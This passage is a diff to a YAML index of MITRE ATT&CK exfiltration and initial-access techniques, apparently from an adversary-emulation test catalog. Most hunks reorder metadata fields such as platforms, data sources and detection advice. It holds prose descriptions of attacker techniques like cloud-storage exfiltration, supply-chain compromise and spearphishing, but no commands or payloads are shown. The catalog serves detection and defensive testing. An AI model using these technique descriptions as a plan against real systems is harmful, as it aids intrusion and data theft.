utilizing the network that do not normally have network communication or have
@@ -48829,9 +50314,16 @@ exfiltration:
by analyzing network traffic or looking for hard-coded values within malware.
If recovered, these keys can be used to decrypt network data from command
and control channels. "
- x_mitre_network_requirements: true
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Malware reverse engineering
+ - Network protocol analysis
+ - Netflow/Enclave netflow
+ - Packet capture
+ - Process use of network
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1048.003:
technique:
@@ -48862,24 +50354,24 @@ exfiltration:
phase_name: exfiltration
modified: '2020-03-28T00:50:31.361Z'
created: '2020-03-15T15:37:47.583Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Network protocol analysis
- - Netflow/Enclave netflow
- - Packet capture
- - Process use of network
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_network_requirements: true
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used. (Citation: University of Birmingham C2) '
- x_mitre_network_requirements: true
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Network protocol analysis
+ - Netflow/Enclave netflow
+ - Packet capture
+ - Process use of network
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1048.003
atomic_tests:
- name: Exfiltration Over Alternative Protocol - HTTP
@@ -48969,10 +50461,14 @@ exfiltration:
phase_name: exfiltration
modified: '2020-03-28T01:02:24.276Z'
created: '2020-03-09T12:51:45.570Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_network_requirements: true
+ x_mitre_detection: Analyze network data for uncommon data flows (e.g., a client
+ sending significantly more data than it receives from a server). Processes
+ utilizing the network that do not normally have network communication or have
+ never been seen before are suspicious. User behavior monitoring may help to
+ detect abnormal patterns of activity.
x_mitre_data_sources:
- Process monitoring
- Process use of network
@@ -48980,14 +50476,10 @@ exfiltration:
- Netflow/Enclave netflow
- Network protocol analysis
- SSL/TLS inspection
- x_mitre_detection: Analyze network data for uncommon data flows (e.g., a client
- sending significantly more data than it receives from a server). Processes
- utilizing the network that do not normally have network communication or have
- never been seen before are suspicious. User behavior monitoring may help to
- detect abnormal patterns of activity.
- x_mitre_network_requirements: true
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1052.001:
technique:
@@ -49011,31 +50503,30 @@ exfiltration:
phase_name: exfiltration
modified: '2020-03-28T00:31:02.204Z'
created: '2020-03-11T13:50:11.467Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - Presence of physical medium or device
+ x_mitre_detection: Monitor file access on removable media. Detect processes
+ that execute when removable media are mounted.
x_mitre_data_sources:
- Process monitoring
- Data loss prevention
- File monitoring
- x_mitre_detection: Monitor file access on removable media. Detect processes
- that execute when removable media are mounted.
- x_mitre_system_requirements:
- - Presence of physical medium or device
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1567.002:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1567.002
- url: https://attack.mitre.org/techniques/T1567/002
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Exfiltration to Cloud Storage
+ created: '2020-03-09T15:04:32.767Z'
+ modified: '2020-03-28T01:02:24.172Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: exfiltration
+ type: attack-pattern
+ id: attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b
description: "Adversaries may exfiltrate data to a cloud storage service rather
than over their primary command and control channel. Cloud storage services
allow for the storage, edit, and retrieval of data from a remote cloud storage
@@ -49043,13 +50534,14 @@ exfiltration:
and Google Docs. Exfiltration to these cloud storage services can provide
a significant amount of cover to the adversary if hosts within the network
are already communicating with the service. "
- id: attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: exfiltration
- modified: '2020-03-28T01:02:24.172Z'
- created: '2020-03-09T15:04:32.767Z'
+ name: Exfiltration to Cloud Storage
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1567.002
+ url: https://attack.mitre.org/techniques/T1567/002
x_mitre_platforms:
- Linux
- macOS
@@ -49093,10 +50585,14 @@ exfiltration:
phase_name: exfiltration
modified: '2020-03-28T00:58:55.433Z'
created: '2020-03-09T14:51:11.772Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_network_requirements: true
+ x_mitre_detection: Analyze network data for uncommon data flows (e.g., a client
+ sending significantly more data than it receives from a server) to code repositories.
+ Processes utilizing the network that do not normally have network communication
+ or have never been seen before are suspicious. User behavior monitoring may
+ help to detect abnormal patterns of activity.
x_mitre_data_sources:
- Process monitoring
- Process use of network
@@ -49104,14 +50600,10 @@ exfiltration:
- Netflow/Enclave netflow
- Network protocol analysis
- SSL/TLS inspection
- x_mitre_detection: Analyze network data for uncommon data flows (e.g., a client
- sending significantly more data than it receives from a server) to code repositories.
- Processes utilizing the network that do not normally have network communication
- or have never been seen before are suspicious. User behavior monitoring may
- help to detect abnormal patterns of activity.
- x_mitre_network_requirements: true
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1029:
technique:
@@ -49134,22 +50626,22 @@ exfiltration:
phase_name: exfiltration
modified: '2020-03-28T00:26:48.769Z'
created: '2017-05-31T21:30:34.139Z'
- x_mitre_version: '1.1'
- x_mitre_data_sources:
- - Netflow/Enclave netflow
- - Process use of network
- - Process monitoring
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_network_requirements: true
x_mitre_detection: Monitor process file access patterns and network behavior.
Unrecognized processes or scripts that appear to be traversing file systems
and sending network traffic may be suspicious. Network connections to the
same destination that occur at the same time of day for multiple days are
suspicious.
- x_mitre_network_requirements: true
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - Netflow/Enclave netflow
+ - Process use of network
+ - Process monitoring
+ x_mitre_version: '1.1'
atomic_tests: []
T1537:
technique:
@@ -49184,25 +50676,25 @@ exfiltration:
phase_name: exfiltration
modified: '2020-03-29T23:43:44.256Z'
created: '2019-08-30T13:03:04.038Z'
- x_mitre_platforms:
- - Azure
- - AWS
- - GCP
- x_mitre_contributors:
- - Praetorian
- x_mitre_network_requirements: true
- x_mitre_permissions_required:
- - User
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Stackdriver logs
- - Azure activity logs
- - AWS CloudTrail logs
+ x_mitre_is_subtechnique: false
x_mitre_detection: 'Monitor account activity for attempts to share data, snapshots,
or backups with untrusted or unusual accounts on the same cloud service provider.
Monitor for anomalous file transfer activity between accounts and to untrusted
VPCs. '
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - Stackdriver logs
+ - Azure activity logs
+ - AWS CloudTrail logs
+ x_mitre_version: '1.0'
+ x_mitre_permissions_required:
+ - User
+ x_mitre_network_requirements: true
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_platforms:
+ - Azure
+ - AWS
+ - GCP
atomic_tests: []
initial-access:
T1078.004:
@@ -49244,6 +50736,19 @@ initial-access:
phase_name: initial-access
modified: '2020-03-23T21:59:36.729Z'
created: '2020-03-13T20:36:57.378Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_detection: Perform regular audits of cloud accounts to detect abnormal
+ or malicious activity, such as accessing information outside of the normal
+ function of the account or account usage at atypical hours.
+ x_mitre_data_sources:
+ - Azure activity logs
+ - Authentication logs
+ - AWS CloudTrail logs
+ - Stackdriver logs
x_mitre_platforms:
- AWS
- GCP
@@ -49251,19 +50756,6 @@ initial-access:
- SaaS
- Azure AD
- Office 365
- x_mitre_data_sources:
- - Azure activity logs
- - Authentication logs
- - AWS CloudTrail logs
- - Stackdriver logs
- x_mitre_detection: Perform regular audits of cloud accounts to detect abnormal
- or malicious activity, such as accessing information outside of the normal
- function of the account or account usage at atypical hours.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
atomic_tests: []
T1195.003:
technique:
@@ -49289,20 +50781,20 @@ initial-access:
phase_name: initial-access
modified: '2020-03-23T12:51:45.475Z'
created: '2020-03-11T14:28:40.064Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: Perform physical inspection of hardware to look for potential
+ tampering. Perform integrity checking on pre-OS boot mechanisms that can be
+ manipulated for malicious purposes.
x_mitre_data_sources:
- Component firmware
- BIOS
- Disk forensics
- EFI
- x_mitre_detection: Perform physical inspection of hardware to look for potential
- tampering. Perform integrity checking on pre-OS boot mechanisms that can be
- manipulated for malicious purposes.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1195.001:
technique:
@@ -49333,22 +50825,41 @@ initial-access:
phase_name: initial-access
modified: '2020-03-11T14:13:42.916Z'
created: '2020-03-11T14:13:42.916Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - File monitoring
- - Web proxy
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: 'Use verification of distributed binaries through hash checking
or other integrity checking mechanisms. Scan downloads for malicious signatures
and attempt to test software and updates prior to deployment while taking
note of potential suspicious activity. '
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Web proxy
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1195.002:
technique:
+ created: '2020-03-11T14:17:21.153Z'
+ modified: '2020-03-11T14:17:21.153Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: initial-access
+ type: attack-pattern
+ id: attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00
+ description: "Adversaries may manipulate application software prior to receipt
+ by a final consumer for the purpose of data or system compromise. Supply chain
+ compromise of software can take place in a number of ways, including manipulation
+ of the application source code, manipulation of the update/distribution mechanism
+ for that software, or replacing compiled releases with a modified version.\n\nTargeting
+ may be specific to a desired victim set or may be distributed to a broad set
+ of consumers but only move on to additional tactics on specific victims.(Citation:
+ Avast CCleaner3 2018) (Citation: Command Five SK 2011) "
+ name: Compromise Software Supply Chain
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1195.002
@@ -49362,25 +50873,6 @@ initial-access:
description: Command Five Pty Ltd. (2011, September). SK Hack by an Advanced
Persistent Threat. Retrieved April 6, 2018.
source_name: Command Five SK 2011
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Compromise Software Supply Chain
- description: "Adversaries may manipulate application software prior to receipt
- by a final consumer for the purpose of data or system compromise. Supply chain
- compromise of software can take place in a number of ways, including manipulation
- of the application source code, manipulation of the update/distribution mechanism
- for that software, or replacing compiled releases with a modified version.\n\nTargeting
- may be specific to a desired victim set or may be distributed to a broad set
- of consumers but only move on to additional tactics on specific victims.(Citation:
- Avast CCleaner3 2018) (Citation: Command Five SK 2011) "
- id: attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: initial-access
- modified: '2020-03-11T14:17:21.153Z'
- created: '2020-03-11T14:17:21.153Z'
x_mitre_platforms:
- Linux
- macOS
@@ -49429,6 +50921,20 @@ initial-access:
phase_name: initial-access
modified: '2020-03-23T21:37:34.567Z'
created: '2020-03-13T20:15:31.974Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_detection: Monitor whether default accounts have been activated or logged
+ into. These audits should also include checks on any appliances and applications
+ for default credentials or SSH keys, and if any are discovered, they should
+ be updated immediately.
+ x_mitre_data_sources:
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ - Authentication logs
+ - Process monitoring
x_mitre_platforms:
- Linux
- macOS
@@ -49439,23 +50945,30 @@ initial-access:
- Office 365
- Azure AD
- SaaS
- x_mitre_data_sources:
- - AWS CloudTrail logs
- - Stackdriver logs
- - Authentication logs
- - Process monitoring
- x_mitre_detection: Monitor whether default accounts have been activated or logged
- into. These audits should also include checks on any appliances and applications
- for default credentials or SSH keys, and if any are discovered, they should
- be updated immediately.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
atomic_tests: []
T1078.002:
technique:
+ created: '2020-03-13T20:21:54.758Z'
+ modified: '2020-03-23T21:08:40.063Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: initial-access
+ type: attack-pattern
+ id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
+ description: |-
+ Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
+
+ Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
+ name: Domain Accounts
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078.002
@@ -49472,27 +50985,6 @@ initial-access:
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
source_name: TechNet Audit Policy
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Domain Accounts
- description: |-
- Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
-
- Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
- id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: initial-access
- modified: '2020-03-23T21:08:40.063Z'
- created: '2020-03-13T20:21:54.758Z'
x_mitre_platforms:
- Linux
- macOS
@@ -49573,7 +51065,23 @@ initial-access:
phase_name: initial-access
modified: '2020-03-29T23:48:15.056Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.2'
+ x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)
+ - Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ - SaaS
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.
+
+ Network intrusion detection systems, sometimes with SSL/TLS MITM inspection, can be used to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.
+
+ Detecting compromise based on the drive-by exploit from a legitimate website may be difficult. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of browser processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.
x_mitre_data_sources:
- Packet capture
- Network device logs
@@ -49581,23 +51089,7 @@ initial-access:
- Web proxy
- Network intrusion detection system
- SSL/TLS inspection
- x_mitre_detection: |-
- Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.
-
- Network intrusion detection systems, sometimes with SSL/TLS MITM inspection, can be used to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.
-
- Detecting compromise based on the drive-by exploit from a legitimate website may be difficult. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of browser processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- - SaaS
- x_mitre_contributors:
- - Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)
- - Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
- x_mitre_is_subtechnique: false
+ x_mitre_version: '1.2'
atomic_tests: []
T1190:
technique:
@@ -49643,17 +51135,10 @@ initial-access:
phase_name: initial-access
modified: '2020-02-18T16:10:38.866Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- - AWS
- - GCP
- - Azure
- x_mitre_detection: Monitor application logs for abnormal behavior that may indicate
- attempted or successful exploitation. Use deep packet inspection to look for
- artifacts of common exploit traffic, such as SQL injection. Web Application
- Firewalls may detect improper inputs attempting exploitation.
+ x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- Azure activity logs
- AWS CloudTrail logs
@@ -49662,10 +51147,17 @@ initial-access:
- Web logs
- Web application firewall logs
- Application logs
- x_mitre_version: '2.1'
- x_mitre_contributors:
- - Praetorian
- x_mitre_is_subtechnique: false
+ x_mitre_detection: Monitor application logs for abnormal behavior that may indicate
+ attempted or successful exploitation. Use deep packet inspection to look for
+ artifacts of common exploit traffic, such as SQL injection. Web Application
+ Firewalls may detect improper inputs attempting exploitation.
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ - AWS
+ - GCP
+ - Azure
atomic_tests: []
T1133:
technique:
@@ -49695,23 +51187,24 @@ initial-access:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T19:37:54.071Z'
+ modified: '2020-06-19T20:07:09.600Z'
created: '2017-05-31T21:31:44.421Z'
- x_mitre_version: '2.1'
- x_mitre_contributors:
- - Daniel Oakley
- - Travis Smith, Tripwire
- x_mitre_data_sources:
- - Authentication logs
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: Follow best practices for detecting adversary use of [Valid
Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to
remote services. Collect authentication logs and analyze for unusual access
patterns, windows of activity, and access outside of normal business hours.
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - Authentication logs
+ x_mitre_contributors:
+ - Daniel Oakley
+ - Travis Smith, Tripwire
+ x_mitre_version: '2.1'
atomic_tests: []
T1200:
technique:
@@ -49759,20 +51252,21 @@ initial-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2019-07-17T21:35:06.932Z'
+ modified: '2020-07-14T19:36:40.493Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Asset management
- - Data loss prevention
- x_mitre_detection: "Asset management systems may help with the detection of
- computer systems or network devices that should not exist on a network. \n\nEndpoint
- sensors may be able to detect the addition of hardware via USB, Thunderbolt,
- and other external device communication ports."
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- Linux
- macOS
+ x_mitre_detection: "Asset management systems may help with the detection of
+ computer systems or network devices that should not exist on a network. \n\nEndpoint
+ sensors may be able to detect the addition of hardware via USB, Thunderbolt,
+ and other external device communication ports."
+ x_mitre_data_sources:
+ - Asset management
+ - Data loss prevention
+ x_mitre_version: '1.0'
atomic_tests: []
T1078.003:
technique:
@@ -49805,21 +51299,21 @@ initial-access:
phase_name: initial-access
modified: '2020-03-23T21:48:41.083Z'
created: '2020-03-13T20:26:46.695Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Authentication logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: Perform regular audits of local system accounts to detect
accounts that may have been created by an adversary for persistence. Look
for suspicious account behavior, such as accounts logged in at odd times or
outside of business hours.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1566:
technique:
@@ -49845,22 +51339,6 @@ initial-access:
phase_name: initial-access
modified: '2020-03-28T00:04:46.427Z'
created: '2020-03-02T18:45:07.892Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- - SaaS
- - Office 365
- x_mitre_detection: |-
- Network intrusion detection systems and email gateways can be used to detect phishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.
-
- URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.
-
- Because most common third-party services used for phishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware.
-
- Anti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
x_mitre_data_sources:
- File monitoring
- Packet capture
@@ -49871,12 +51349,31 @@ initial-access:
- Detonation chamber
- SSL/TLS inspection
- Anti-virus
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_detection: |-
+ Network intrusion detection systems and email gateways can be used to detect phishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.
+
+ URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.
+
+ Because most common third-party services used for phishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware.
+
+ Anti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - SaaS
+ - Office 365
atomic_tests: []
T1091:
technique:
- id: attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Replication Through Removable Media
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1091
+ external_id: T1091
description: Adversaries may move onto systems, possibly those on disconnected
or air-gapped networks, by copying malware to removable media and taking advantage
of Autorun features when the media is inserted into a system and executes.
@@ -49886,20 +51383,18 @@ initial-access:
In the case of Initial Access, this may occur through manual manipulation
of the media, modification of systems used to initially format the media,
or modification to the media's firmware itself.
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1091
- external_id: T1091
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ name: Replication Through Removable Media
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: lateral-movement
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2019-07-18T17:52:28.429Z'
+ modified: '2020-07-14T19:45:59.638Z'
created: '2017-05-31T21:31:08.977Z'
+ x_mitre_is_subtechnique: false
x_mitre_version: '1.0'
x_mitre_data_sources:
- File monitoring
@@ -49942,10 +51437,12 @@ initial-access:
phase_name: initial-access
modified: '2020-03-27T23:56:40.369Z'
created: '2020-03-02T19:05:18.137Z'
- x_mitre_platforms:
- - macOS
- - Windows
- - Linux
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: |-
+ Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.
+
+ Anti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.
x_mitre_data_sources:
- File monitoring
- Packet capture
@@ -49953,12 +51450,10 @@ initial-access:
- Detonation chamber
- Email gateway
- Mail server
- x_mitre_detection: |-
- Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.
-
- Anti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - macOS
+ - Windows
+ - Linux
identifier: T1566.001
atomic_tests:
- name: Download Phishing Attachment - VBScript
@@ -50025,21 +51520,13 @@ initial-access:
name: powershell
T1566.002:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1566.002
- url: https://attack.mitre.org/techniques/T1566/002
- - external_id: CAPEC-163
- source_name: capec
- url: https://capec.mitre.org/data/definitions/163.html
- - source_name: Trend Micro Pawn Storm OAuth 2017
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks
- description: Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication
- in Advanced Social Engineering Attacks. Retrieved October 4, 2019.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Spearphishing Link
+ created: '2020-03-02T19:15:44.182Z'
+ modified: '2020-03-02T19:44:47.843Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: initial-access
+ type: attack-pattern
+ id: attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7
description: "Adversaries may send spearphishing emails with a malicious link
in an attempt to elicit sensitive information and/or gain access to victim
systems. Spearphishing with a link is a specific variant of spearphishing.
@@ -50061,13 +51548,21 @@ initial-access:
Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in
order to gain access to protected applications and information.(Citation:
Trend Micro Pawn Storm OAuth 2017)"
- id: attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7
- type: attack-pattern
